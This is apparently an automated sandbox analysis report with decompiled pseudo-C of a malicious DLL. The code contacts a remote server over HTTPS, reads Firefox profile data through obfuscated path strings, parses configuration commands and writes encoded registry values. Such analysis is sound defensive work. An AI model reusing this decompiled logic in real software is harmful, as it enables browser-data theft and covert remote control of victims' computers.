0x10001942
0x1000195b
0x1000195d
0x1000196b
0x1000196d
0x10001973
0x10001975
0x10001982
0x10001988
0x1000198d
0x00000000
0x00000000
0x1000199b
0x100019a2
0x100019a7
0x100019aa
0x100019b1
0x00000000
0x00000000
0x00000000
0x100019b1
0x10001975
0x100019b3
0x100019b4
0x100019be
0x100019c3
0x100019c6
0x100019d0
0x100019d5
0x100019da
0x100019e0
0x100019e8
0x100019f0
0x100019f7

APIs

Part of subcall function 1000100E: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 10001020
Part of subcall function 1000100E: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,0001000C,?), ref: 1000103D
Part of subcall function 1000100E: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 1000104E
Part of subcall function 1000100E: UnmapViewOfFile.KERNEL32(00000000), ref: 10001065
Part of subcall function 1000100E: CloseHandle.KERNEL32(?), ref: 10001077

InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 10001900
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 10001918
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00800000,00000000), ref: 10001931

Part of subcall function 10001C7D: InternetQueryOptionA.WININET(00000004,0000001F,?,?), ref: 10001C96
Part of subcall function 10001C7D: InternetSetOptionA.WININET(00000004,0000001F,00003180,00000004), ref: 10001CAE

HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 10001953
InternetReadFile.WININET(?,00000000,00010000,000000FF), ref: 10001982

Part of subcall function 1000291A: GetProcessHeap.KERNEL32(00000008,00008000,00000000,?,1000278D), ref: 1000293A
Part of subcall function 1000291A: HeapReAlloc.KERNEL32(00000000,?,1000278D), ref: 10002941

Part of subcall function 100028FC: GetProcessHeap.KERNEL32(00000008,00008000,?,10002930,00008000,?,1000278D), ref: 1000290B
Part of subcall function 100028FC: HeapFree.KERNEL32(00000000,?,10002930), ref: 10002912

Part of subcall function 10001DD8: Sleep.KERNEL32(000000C8,00000000,?,10002170,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,10001EA5), ref: 10001DE9

InternetCloseHandle.WININET(00000000), ref: 100019D0
InternetCloseHandle.WININET(?), ref: 100019D5
InternetCloseHandle.WININET(?), ref: 100019DA

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Part of subcall function 100027C7: GetProcessHeap.KERNEL32(00000008,00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027CF
Part of subcall function 100027C7: RtlAllocateHeap.NTDLL(00000000,?,1000546F,00000008,00000010,00000000,00002710,771CC486,00000000,00000000,?,10005B31,?,00000000), ref: 100027D6

Strings

SNFIRNW, xrefs: 100018BB

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000602C, Relevance: 12.7, APIs: 10, Instructions: 229
string

C-Code - Quality: 97%

			E1000602C(intOrPtr* __ecx) {
				char _v5;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _t61;
				CHAR* _t70;
				CHAR* _t82;
				void* _t89;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr _t108;
				CHAR* _t113;
				intOrPtr _t118;
				void* _t137;
				intOrPtr* _t139;

				_t117 = __ecx;
				_t139 = __ecx;
				_v5 = 0;
				_t61 = E10002F3F(__ecx, 0x10007600, 6);
				_t137 = 7;
				_v48 = _t61;
				_t113 = E10002F3F(__ecx, 0x10007608, _t137);
				_v12 = _t113;
				_v44 = E10002F3F(_t117, 0x10007610, 6);
				_v40 = E10002F3F(_t117, 0x10007618, _t137);
				_v36 = E10002F3F(_t117, 0x10007620, 8);
				_v32 = E10002F3F(_t117, 0x10007628, _t137);
				_v28 = E10002F3F(_t117, 0x10007630, 0xa);
				_v24 = E10002F3F(_t117, 0x10007640, 0xb);
				_v20 = E10002F3F(_t117, 0x1000764c, _t137);
				_t70 = E10002F3F(_t117, 0x1000765c, 8);
				_t118 =  *((intOrPtr*)(__ecx + 0x14));
				_v16 = _t70;
				if(_t118 <  *((intOrPtr*)(__ecx + 0x10))) {
					do {
						_t82 =  *(_t139 + 0xc);
						if( *_t82 != 0) {
							if(lstrcmpiA(_t82, _v48) != 0) {
								if(lstrcmpiA( *(_t139 + 0xc), _t113) != 0) {
									if(lstrcmpiA( *(_t139 + 0xc), _v44) != 0) {
										if(lstrcmpiA( *(_t139 + 0xc), _v40) != 0) {
											if(lstrcmpiA( *(_t139 + 0xc), _v36) != 0) {
												if(lstrcmpiA( *(_t139 + 0xc), _v32) == 0) {
													L37:
													_v5 = 1;
												} else {
													if(lstrcmpiA( *(_t139 + 0xc), _v28) != 0) {
														if(lstrcmpiA( *(_t139 + 0xc), _v24) == 0) {
															goto L37;
														} else {
															if(lstrcmpiA( *(_t139 + 0xc), _v20) != 0) {
																if(lstrcmpiA( *(_t139 + 0xc), _v16) != 0) {
																	E1000632F(_t139,  *(_t139 + 0xc));
																} else {
																	goto L37;
																}
															} else {
																_t114 =  *((intOrPtr*)(_t139 + 8));
																if( *((intOrPtr*)(_t139 + 8)) != 0) {
																	E10006AF7(_t114);
																	E10003EE0(_t114);
																}
																if(E10003EC9(4) == 0) {
																	_t96 = 0;
																} else {
																	_t96 = E10006AF1(_t95);
																}
																 *((intOrPtr*)(_t139 + 8)) = _t96;
																goto L35;
															}
														}
													} else {
														_t116 =  *((intOrPtr*)(_t139 + 4));
														if( *((intOrPtr*)(_t139 + 4)) != 0) {
															E10006ADD(_t90, _t116);
															E10003EE0(_t116);
														}
														if(E10003EC9(4) == 0) {
															_t100 = 0;
														} else {
															_t100 = E10006AF1(_t99);
														}
														 *((intOrPtr*)(_t139 + 4)) = _t100;
														goto L35;
													}
												}
											} else {
												E10003D3B(_t87,  *_t139);
											}
										} else {
											E10003CC7(_t86,  *_t139);
										}
									} else {
										E10003D40(_t85,  *_t139);
									}
								} else {
									E10003CA4(_t84,  *_t139);
								}
							} else {
								_t115 =  *_t139;
								if( *_t139 != 0) {
									E1000386A(_t115);
									E10003EE0(_t115);
								}
								if(E10003EC9(0x14) == 0) {
									_t108 = 0;
								} else {
									_t108 = E10003857(_t107);
								}
								 *_t139 = _t108;
								L35:
								_t113 = _v12;
							}
							_push( *(_t139 + 0xc));
							_t89 = E10002B95();
							 *((intOrPtr*)(_t139 + 0x14)) =  *((intOrPtr*)(_t139 + 0x14)) + _t89;
							 *(_t139 + 0xc) =  &(( *(_t139 + 0xc))[_t89]);
							if(_v5 == 0) {
								goto L40;
							}
						} else {
							 *(_t139 + 0xc) =  &(_t82[1]);
							 *((intOrPtr*)(_t139 + 0x14)) = _t118 + 1;
							goto L40;
						}
						break;
						L40:
						_t118 =  *((intOrPtr*)(_t139 + 0x14));
					} while (_t118 <  *((intOrPtr*)(_t139 + 0x10)));
					_t70 = _v16;
				}
				E10003F0A(_t70);
				E10003F0A(_v20);
				E10003F0A(_v24);
				E10003F0A(_v28);
				E10003F0A(_v32);
				E10003F0A(_v36);
				E10003F0A(_v40);
				E10003F0A(_v44);
				E10003F0A(_t113);
				E10003F0A(_v48);
				return _v5;
			}

0x1000602c
0x1000603c
0x1000603e
0x10006042
0x10006049
0x10006050
0x10006058
0x10006061
0x1000606f
0x1000607e
0x1000608c
0x1000609b
0x100060aa
0x100060b5
0x100060ca
0x100060cd
0x100060d2
0x100060d8
0x100060de
0x100060ea
0x100060ea
0x100060f0
0x10006109
0x10006145
0x1000615d
0x10006175
0x1000618d
0x100061a5
0x10006240
0x10006240
0x100061ab
0x100061b5
0x100061f2
0x00000000
0x100061f4
0x100061fe
0x1000623e
0x1000624b
0x00000000
0x00000000
0x00000000
0x10006200
0x10006200
0x10006205
0x10006209
0x1000620f
0x10006214
0x1000621f
0x1000622a
0x10006221
0x10006223
0x10006223
0x1000622c
0x00000000
0x1000622c
0x100061fe
0x100061b7
0x100061b7
0x100061bc
0x100061c0
0x100061c6
0x100061cb
0x100061d6
0x100061e1
0x100061d8
0x100061da
0x100061da
0x100061e3
0x00000000
0x100061e3
0x100061b5
0x1000618f
0x10006191
0x10006191
0x10006177
0x10006179
0x10006179
0x1000615f
0x10006161
0x10006161
0x10006147
0x10006149
0x10006149
0x1000610b
0x1000610b
0x1000610f
0x10006113
0x10006119
0x1000611e
0x10006129
0x10006134
0x1000612b
0x1000612d
0x1000612d
0x10006136
0x1000622f
0x1000622f
0x1000622f
0x10006250
0x10006253
0x10006258
0x1000625b
0x10006263
0x00000000
0x00000000
0x100060f2
0x100060f3
0x100060f9
0x00000000
0x100060f9
0x00000000
0x10006265
0x10006265
0x10006268
0x10006271
0x10006271
0x10006275
0x1000627d
0x10006285
0x1000628d
0x10006295
0x1000629d
0x100062a5
0x100062ad
0x100062b3
0x100062bb
0x100062cc

APIs

lstrcmpiA.KERNEL32(?,?), ref: 10006105
lstrcmpiA.KERNEL32(?,00000000), ref: 10006141
lstrcmpiA.KERNEL32(?,?), ref: 10006159
lstrcmpiA.KERNEL32(?,?), ref: 10006171
lstrcmpiA.KERNEL32(?,?), ref: 10006189
lstrcmpiA.KERNEL32(?,?), ref: 100061A1
lstrcmpiA.KERNEL32(?,?), ref: 100061B1
lstrcmpiA.KERNEL32(?,10005DDC), ref: 100061EE
lstrcmpiA.KERNEL32(?,00000000), ref: 100061FA

Part of subcall function 10003EC9: GetProcessHeap.KERNEL32(?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000,?,?,10002CB3,?), ref: 10003ECC
Part of subcall function 10003EC9: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,10002F51,?,00000000,?,?,?,10002D0F,1000719C,0000001B,?,00000000), ref: 10003ED8

Part of subcall function 10006AF7: VirtualFree.KERNEL32(?,00000000,00008000,1000620E), ref: 10006B05

Part of subcall function 10003EE0: GetProcessHeap.KERNEL32(?,10002D2E,00000000,?,00000000,?,?,10002CB3,?), ref: 10003EE3
Part of subcall function 10003EE0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10003EF9

lstrcmpiA.KERNEL32(?,00000000), ref: 1000623A

Part of subcall function 1000632F: lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063A7
Part of subcall function 1000632F: lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063BF
Part of subcall function 1000632F: lstrcmpiA.KERNEL32(10006250,10006250,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063D7
Part of subcall function 1000632F: lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063EF
Part of subcall function 1000632F: lstrcmpiA.KERNEL32(10006250,10006250,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 10006408
Part of subcall function 1000632F: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 10006413

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000667B, Relevance: 12.3, APIs: 8, Instructions: 282
file

C-Code - Quality: 75%

			E1000667B() {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				char _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				char _v36;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				char _v140;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				long _v176;
				WCHAR* _v180;
				WCHAR* _t97;
				WCHAR* _t98;
				short _t99;
				short _t100;
				short _t101;
				short _t103;
				short _t104;
				short _t105;
				short _t106;
				short _t107;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t116;
				short _t123;
				short _t124;
				short _t125;
				short _t126;
				short _t127;
				short _t128;
				short _t130;
				short _t131;
				short _t132;
				void* _t139;
				short _t140;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t147;
				void* _t159;
				WCHAR* _t166;
				void* _t167;
				short _t169;
				short _t170;
				short _t171;
				short _t172;
				short _t176;
				short _t177;
				short _t178;
				short _t179;
				WCHAR* _t180;
				void* _t181;
				WCHAR* _t183;
				long _t185;

				_t97 = E10003F01();
				_t166 = _t97;
				_v180 = _t166;
				__imp__SHGetSpecialFolderPathW(0, _t166, 0x1a, 0, 0x208);
				_push(0x208);
				_t98 = E10003F01();
				_t183 = _t98;
				_t99 = 0x4d;
				_t176 = 0x6f;
				_v36 = _t99;
				_t100 = 0x7a;
				_t169 = 0x69;
				_t179 = 0x6c;
				_v32 = _t100;
				_t101 = 0x61;
				_v24 = _t101;
				_v22 = 0;
				_t103 = 0x46;
				_v20 = _t103;
				_t104 = 0x72;
				_v16 = _t104;
				_t105 = 0x65;
				_v14 = _t105;
				_t106 = 0x66;
				_v12 = _t106;
				_t107 = 0x78;
				_v8 = _t107;
				_v6 = 0;
				_t109 = 0x70;
				_v140 = _t109;
				_t110 = 0x72;
				_v138 = _t110;
				_t111 = 0x66;
				_v134 = _t111;
				_t112 = 0x65;
				_v34 = _t176;
				_v10 = _t176;
				_v136 = _t176;
				_t177 = 0x73;
				_v128 = _t112;
				_t113 = 0x2e;
				_v124 = _t113;
				_v30 = _t169;
				_v28 = _t179;
				_v26 = _t179;
				_v18 = _t169;
				_v132 = _t169;
				_v130 = _t179;
				_v126 = _t177;
				_v122 = _t169;
				_t114 = 0x6e;
				_v120 = _t114;
				_v116 = 0;
				_v118 = _t169;
				_t170 = 0x25;
				_t116 = 0x5c;
				_v108 = _t116;
				_v102 = _t116;
				_v96 = _t116;
				_v90 = 0;
				_v112 = _t170;
				_v110 = _t177;
				_v106 = _t170;
				_v104 = _t177;
				_v100 = _t170;
				_v98 = _t177;
				_v94 = _t170;
				_v92 = _t177;
				wsprintfW(_t183,  &_v112, _t166,  &_v36,  &_v20,  &_v140);
				_t171 = 0x50;
				_t123 = 0x72;
				_v66 = _t123;
				_t124 = 0x6f;
				_v64 = _t124;
				_t125 = 0x66;
				_v62 = _t125;
				_t126 = 0x69;
				_v60 = _t126;
				_t127 = 0x65;
				_v56 = _t127;
				_t128 = 0x30;
				_v54 = _t128;
				_v52 = 0;
				_t130 = 0x61;
				_v46 = _t130;
				_t131 = 0x74;
				_v44 = _t131;
				_t132 = 0x68;
				_v42 = _t132;
				_push(0x208);
				_v68 = _t171;
				_v58 = _t179;
				_v48 = _t171;
				_v40 = 0;
				_t180 = E10003F01();
				GetPrivateProfileStringW( &_v68,  &_v48, 0x100076d0, _t180, 0x104, _t183);
				E10003F0A(_t183);
				_t139 = E100031A4(_t180, 0x2f);
				_t178 = 0x5c;
				if(_t139 != 0) {
					_t180[_t139 - _t180 >> 1] = _t178;
				}
				_t140 = 0x70;
				_v88 = _t140;
				_t141 = 0x72;
				_v86 = _t141;
				_t142 = 0x65;
				_v84 = _t142;
				_t143 = 0x66;
				_t172 = 0x73;
				_v82 = _t143;
				_t144 = 0x2e;
				_v78 = _t144;
				_t145 = 0x6a;
				_v76 = _t145;
				_v72 = 0;
				_t147 = 0x25;
				_v172 = _t147;
				_v166 = _t147;
				_v160 = _t147;
				_v154 = _t147;
				_v148 = _t147;
				_v144 = 0;
				_v80 = _t172;
				_v74 = _t172;
				_v170 = _t172;
				_v168 = _t178;
				_v164 = _t172;
				_v162 = _t178;
				_v158 = _t172;
				_v156 = _t178;
				_v152 = _t172;
				_v150 = _t178;
				_v146 = _t172;
				wsprintfW(_t166,  &_v172, _t166,  &_v36,  &_v20, _t180,  &_v88);
				E10003F0A(_t180);
				_t181 = 0;
				_t167 = CreateFileW(_t166, 0x80000000, 1, 0, 3, 0, 0);
				if(_t167 != 0xffffffff) {
					_t185 = GetFileSize(_t167, 0);
					_push(_t185);
					_t159 = E10003F01();
					_v176 = _v176 & 0x00000000;
					_t181 = _t159;
					if(ReadFile(_t167, _t181, _t185,  &_v176, 0) == 0) {
						E10003F0A(_t181);
						_t181 = 0;
					}
					CloseHandle(_t167);
				}
				E10003F0A(_v180);
				return _t181;
			}

0x1000668d
0x10006695
0x1000669c
0x100066a2
0x100066a8
0x100066a9
0x100066b0
0x100066b2
0x100066b5
0x100066b8
0x100066bc
0x100066bf
0x100066c2
0x100066c5
0x100066c9
0x100066cc
0x100066d2
0x100066d6
0x100066d9
0x100066dd
0x100066e0
0x100066e4
0x100066e7
0x100066eb
0x100066ee
0x100066f2
0x100066f5
0x100066fb
0x100066ff
0x10006702
0x10006709
0x1000670c
0x10006713
0x10006716
0x1000671d
0x10006720
0x10006724
0x10006728
0x1000672f
0x10006732
0x10006736
0x10006739
0x1000673d
0x10006741
0x10006745
0x10006749
0x1000674d
0x10006751
0x10006755
0x10006759
0x1000675d
0x10006760
0x10006766
0x1000676a
0x1000676e
0x10006771
0x10006772
0x10006776
0x1000677a
0x10006780
0x1000678e
0x10006796
0x1000679f
0x100067a5
0x100067a9
0x100067ad
0x100067b1
0x100067b5
0x100067b9
0x100067c1
0x100067c4
0x100067c7
0x100067cb
0x100067ce
0x100067d2
0x100067d5
0x100067d9
0x100067dc
0x100067e0
0x100067e3
0x100067e7
0x100067e8
0x100067f0
0x100067f4
0x100067f7
0x100067fb
0x100067fc
0x10006802
0x10006803
0x10006809
0x1000680e
0x10006812
0x10006816
0x1000681a
0x10006826
0x1000683c
0x10006843
0x1000684b
0x10006855
0x10006858
0x1000685e
0x1000685e
0x10006864
0x10006867
0x1000686b
0x1000686e
0x10006872
0x10006875
0x10006879
0x1000687c
0x1000687f
0x10006883
0x10006886
0x1000688a
0x1000688b
0x10006893
0x10006897
0x10006898
0x1000689f
0x100068a6
0x100068ad
0x100068b4
0x100068bd
0x100068cc
0x100068d4
0x100068e0
0x100068e9
0x100068f0
0x100068f7
0x100068fe
0x10006905
0x1000690c
0x10006913
0x1000691a
0x10006921
0x10006928
0x10006932
0x10006947
0x1000694c
0x10006956
0x10006958
0x10006959
0x1000695e
0x10006965
0x1000697c
0x1000697f
0x10006985
0x10006985
0x10006988
0x10006988
0x10006994
0x100069a2

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 100066A2
wsprintfW.USER32 ref: 100067B9
GetPrivateProfileStringW.KERNEL32(?,?,100076D0,00000000,00000104,00000000), ref: 1000683C
wsprintfW.USER32 ref: 10006921
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10006941
GetFileSize.KERNEL32(00000000,00000000), ref: 10006950
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10006974
CloseHandle.KERNEL32(00000000), ref: 10006988

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10006457, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 68
string

C-Code - Quality: 80%

			E10006457(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				char _v20;
				int _t15;
				int _t16;
				CHAR* _t19;
				void* _t20;
				intOrPtr* _t27;
				int _t28;
				CHAR* _t35;
				CHAR* _t37;

				_t27 = __ecx;
				_t37 = 0;
				_t30 =  *__ecx;
				if( *__ecx != 0) {
					_v8 = _v8 & 0;
					_t35 = E10003B47(_t30,  &_v8);
					if(_t35 != 0 || _v8 != 0) {
						_t15 = lstrlenA(E10003B44( *_t27));
						_t16 = lstrlenA(_t35);
						_push(lstrlenA(" - ") + _t15 + _t16 + 0xb);
						_t19 = E10003F01();
						_push(_v8);
						_t37 = _t19;
						_v20 = 0x2d207325;
						_v16 = 0x756c2520;
						_v12 = 9;
						_t20 = E10003B44( *_t27);
						_t9 =  &_v20; // 0x2d207325
						_t28 = wsprintfA(_t37, _t9, _t20);
						if(_t35 != 0) {
							E100030DF(_t28 + _t37, _t35, lstrlenA(_t35));
							E10003F0A(_t35);
						}
					}
				}
				return _t37;
			}

0x1000645e
0x10006461
0x10006463
0x10006467
0x1000646d
0x1000647a
0x1000647e
0x10006491
0x1000649a
0x100064b2
0x100064b3
0x100064b9
0x100064be
0x100064c0
0x100064c7
0x100064ce
0x100064d4
0x100064da
0x100064e8
0x100064ec
0x100064fb
0x10006501
0x10006506
0x100064ec
0x10006509
0x10006511

APIs

Part of subcall function 10003B47: wsprintfW.USER32 ref: 10003BAC
Part of subcall function 10003B47: wsprintfW.USER32 ref: 10003BD3
Part of subcall function 10003B47: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003BDD
Part of subcall function 10003B47: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10003BF3
Part of subcall function 10003B47: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003BFE
Part of subcall function 10003B47: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C13
Part of subcall function 10003B47: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C1B
Part of subcall function 10003B47: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003C23
Part of subcall function 10003B47: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10003C41
Part of subcall function 10003B47: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10003C51
Part of subcall function 10003B47: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10003C59
Part of subcall function 10003B47: CloseHandle.KERNEL32(00000000), ref: 10003C89

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10006491
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 1000649A
lstrlenA.KERNEL32( - ,?,?,00000000), ref: 100064A7
wsprintfA.USER32 ref: 100064DF
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 100064EF

Strings

%s - %lu, xrefs: 100064DA, 100064DD
- , xrefs: 100064A0

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10005920, Relevance: 9.1, APIs: 6, Instructions: 82
registrystring

C-Code - Quality: 84%

			E10005920(CHAR* _a4) {
				void* _v8;
				char* _v12;
				void* __ecx;
				char* _t10;
				char* _t25;
				void* _t28;
				void* _t30;
				void* _t38;
				CHAR* _t40;

				_push(_t28);
				_push(_t28);
				_t10 = E10002F3F(_t28, 0x10007530, 0x43);
				_t30 = _t38;
				_t25 = _t10;
				_v8 = 0;
				_v12 = _t25;
				if(RegCreateKeyExA(0x80000002, _t25, 0, 0, 0, 2, 0,  &_v8, 0) != 0) {
					RegCreateKeyExA(0x80000001, _t25, 0, 0, 0, 2, 0,  &_v8, 0);
				}
				_t26 = E10002F3F(_t30, 0x10007574, 6);
				_t40 = E10002D8F(_a4, lstrlenA(_a4));
				RegSetValueExA(_v8, _t13, 0, 1, _t40, lstrlenA(_t40));
				E10003F0A(_t40);
				E10003F0A(_t26);
				RegCloseKey(_v8);
				return E10003F0A(_v12);
			}

0x10005923
0x10005924
0x1000592f
0x1000593d
0x1000593f
0x10005941
0x10005947
0x1000595b
0x1000596e
0x1000596e
0x10005982
0x10005996
0x100059a5
0x100059ac
0x100059b2
0x100059bc
0x100059d1

APIs

RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,10005DF1), ref: 10005957
RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000), ref: 1000596E
lstrlenA.KERNEL32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005989

Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DAB
Part of subcall function 10002D8F: CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,00000000), ref: 10002DC8

lstrlenA.KERNEL32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10005999
RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 100059A5
RegCloseKey.ADVAPI32(00000000,?,10005DF1,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 100059BC

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000632F, Relevance: 7.6, APIs: 6, Instructions: 103
string

C-Code - Quality: 95%

			E1000632F(intOrPtr* __ecx, CHAR* _a4) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				char* _t19;
				intOrPtr* _t41;
				void* _t44;
				CHAR* _t50;
				char* _t51;
				CHAR* _t52;

				_t50 = _a4;
				_t41 = __ecx;
				_t19 = E10003132(_t50, 0x3d);
				_t51 = _t19;
				_pop(_t44);
				if(_t51 == 0) {
					return _t19;
				}
				 *_t51 = 0;
				_t52 = _t51 + 1;
				_v20 = E10002F3F(_t44, 0x100075e4, 8);
				_v16 = E10002F3F(_t44, 0x100075ec, 0xa);
				_v12 = E10002F3F(_t44, 0x100075f8, 6);
				_v8 = E10002F3F(_t44, 0x1000763c, 2);
				_a4 = E10002F3F(_t44, 0x10007654, 5);
				if(lstrcmpiA(_t50, _v20) != 0) {
					if(lstrcmpiA(_t50, _v16) != 0) {
						if(lstrcmpiA(_t50, _v12) != 0) {
							if(lstrcmpiA(_t50, _v8) != 0) {
								if(lstrcmpiA(_t50, _a4) == 0) {
									E10006B0C( *((intOrPtr*)(_t41 + 8)), _t52, lstrlenA(_t52));
								}
							} else {
								E10006AE1( *((intOrPtr*)(_t41 + 4)), _t52);
							}
						} else {
							E10003CCC( *_t41, _t52);
						}
					} else {
						E10003CE3( *_t41, _t52);
					}
				} else {
					E10003CA9( *_t41, _t52);
				}
				E10003F0A(_a4);
				E10003F0A(_v8);
				E10003F0A(_v12);
				E10003F0A(_v16);
				return E10003F0A(_v20);
			}

0x10006338
0x1000633b
0x10006340
0x10006345
0x10006348
0x1000634b
0x10006454
0x10006454
0x10006353
0x10006356
0x10006368
0x10006377
0x10006386
0x10006395
0x100063a0
0x100063af
0x100063c7
0x100063df
0x100063f7
0x10006410
0x1000641e
0x1000641e
0x100063f9
0x100063fd
0x100063fd
0x100063e1
0x100063e4
0x100063e4
0x100063c9
0x100063cc
0x100063cc
0x100063b1
0x100063b4
0x100063b4
0x10006426
0x1000642e
0x10006436
0x1000643e
0x00000000

APIs

